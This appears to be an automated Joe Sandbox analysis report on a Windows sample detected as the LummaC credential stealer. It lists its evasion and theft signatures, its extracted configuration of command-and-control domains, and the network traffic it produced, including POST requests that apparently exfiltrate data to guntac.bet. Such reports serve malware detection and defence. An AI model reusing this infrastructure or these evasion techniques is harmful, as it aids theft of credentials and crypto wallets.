Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1637453
MD5:6f5fd4f79167a7e2c0db0a9f925118b4
SHA1:5a9887316db9016897fbb8e7e349ec5e27fb6ba8
SHA256:ceb426731770a6cc7dcf8eb3a1c0f861e3e5e94562f7c0c37003219485e47509
Tags:exeuser-jstrosch
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected non-DNS traffic on DNS port
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6F5FD4F79167A7E2C0DB0A9F925118B4)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["begindecafer.world/QwdZdf", "garagedrootz.top/oPsoJAN", "modelshiverd.icu/bJhnsj", "arisechairedd.shop/JnsHY", "catterjur.run/boSnzhu", "orangemyther.live/IozZ", "fostinjec.today/LksNAz"], "Build id": "ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000000.00000003.1136637956.0000000000A98000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 6392JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 6392JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.file.exe.220000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-13T16:40:03.885406+010020283713Unknown Traffic192.168.2.849700104.73.234.102443TCP
            2025-03-13T16:40:03.885406+010020283713Unknown Traffic192.168.2.849697104.73.234.102443TCP
            2025-03-13T16:40:03.885406+010020283713Unknown Traffic192.168.2.849703104.73.234.102443TCP
            2025-03-13T16:40:03.885406+010020283713Unknown Traffic192.168.2.849706104.73.234.102443TCP
            2025-03-13T16:40:12.999379+010020283713Unknown Traffic192.168.2.849682104.73.234.102443TCP
            2025-03-13T16:40:15.930609+010020283713Unknown Traffic192.168.2.849683188.114.97.3443TCP
            2025-03-13T16:40:19.449635+010020283713Unknown Traffic192.168.2.849684104.73.234.102443TCP
            2025-03-13T16:40:22.189166+010020283713Unknown Traffic192.168.2.849685188.114.97.3443TCP
            2025-03-13T16:40:25.133637+010020283713Unknown Traffic192.168.2.849686104.73.234.102443TCP
            2025-03-13T16:40:28.100390+010020283713Unknown Traffic192.168.2.849688104.73.234.102443TCP
            2025-03-13T16:40:31.495330+010020283713Unknown Traffic192.168.2.849693104.73.234.102443TCP
            2025-03-13T16:40:34.325343+010020283713Unknown Traffic192.168.2.849694104.73.234.102443TCP
            2025-03-13T16:40:37.749650+010020283713Unknown Traffic192.168.2.849695104.73.234.102443TCP
            2025-03-13T16:40:40.555151+010020283713Unknown Traffic192.168.2.849696104.73.234.102443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: file.exeAvira: detected
            Antivirus detection for URL or domain
            Source: orangemyther.live/IozZAvira URL Cloud: Label: malware
            Source: begindecafer.world/QwdZdfAvira URL Cloud: Label: malware
            Source: garagedrootz.top/oPsoJANAvira URL Cloud: Label: malware
            Source: https://fostinjec.today:443/LksNAzfAvira URL Cloud: Label: malware
            Source: https://begindecafer.world:443/QwdZdfAvira URL Cloud: Label: malware
            Source: catterjur.run/boSnzhuAvira URL Cloud: Label: malware
            Source: modelshiverd.icu/bJhnsjAvira URL Cloud: Label: malware
            Source: arisechairedd.shop/JnsHYAvira URL Cloud: Label: malware
            Source: https://arisechairedd.shop:443/JnsHYAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["begindecafer.world/QwdZdf", "garagedrootz.top/oPsoJAN", "modelshiverd.icu/bJhnsj", "arisechairedd.shop/JnsHY", "catterjur.run/boSnzhu", "orangemyther.live/IozZ", "fostinjec.today/LksNAz"], "Build id": "ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518"}
            Multi AV Scanner detection for submitted file
            Source: file.exeVirustotal: Detection: 64%Perma Link
            Source: file.exeReversingLabs: Detection: 60%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmpString decryptor: begindecafer.world/QwdZdf
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmpString decryptor: garagedrootz.top/oPsoJAN
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmpString decryptor: modelshiverd.icu/bJhnsj
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmpString decryptor: arisechairedd.shop/JnsHY
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmpString decryptor: catterjur.run/boSnzhu
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmpString decryptor: orangemyther.live/IozZ
            Source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmpString decryptor: fostinjec.today/LksNAz
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49682 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49683 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49684 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49685 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49686 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49688 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49693 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49694 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49695 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49696 version: TLS 1.2

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: begindecafer.world/QwdZdf
            Source: Malware configuration extractorURLs: garagedrootz.top/oPsoJAN
            Source: Malware configuration extractorURLs: modelshiverd.icu/bJhnsj
            Source: Malware configuration extractorURLs: arisechairedd.shop/JnsHY
            Source: Malware configuration extractorURLs: catterjur.run/boSnzhu
            Source: Malware configuration extractorURLs: orangemyther.live/IozZ
            Source: Malware configuration extractorURLs: fostinjec.today/LksNAz
            Source: global trafficTCP traffic: 192.168.2.8:51354 -> 162.159.36.2:53
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 104.73.234.102 104.73.234.102
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49685 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49686 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49683 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49696 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49693 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49694 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49688 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49695 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49700 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49697 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49703 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.73.234.102:443
            Source: global trafficHTTP traffic detected: POST /bSHsyZD HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: guntac.bet
            Source: global trafficHTTP traffic detected: POST /bSHsyZD HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=gDVu0p986User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14490Host: guntac.bet
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: file.exe, 00000000.00000003.919467475.0000000000AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valveso equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1068212000.0000000005406000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1010132835.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1009365799.00000000053F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ ht3 equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ htIk equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.919467475.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=Nonesessionid=3305f16f0b7ac2a954b67115; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type36122Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 13 Mar 2025 15:40:13 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=Nonesessionid=8c02966154117fde8952c494; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 13 Mar 2025 15:40:28 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=Nonesessionid=a56d3429ca48ac76cba2142b; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 13 Mar 2025 15:40:35 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1102918112.00000000053EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=Nonesessionid=dc1700330cc29ea6d894c6bc; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 13 Mar 2025 15:40:32 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1010132835.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1009365799.00000000053F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ ht3 equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ htIk equals www.youtube.com (Youtube)
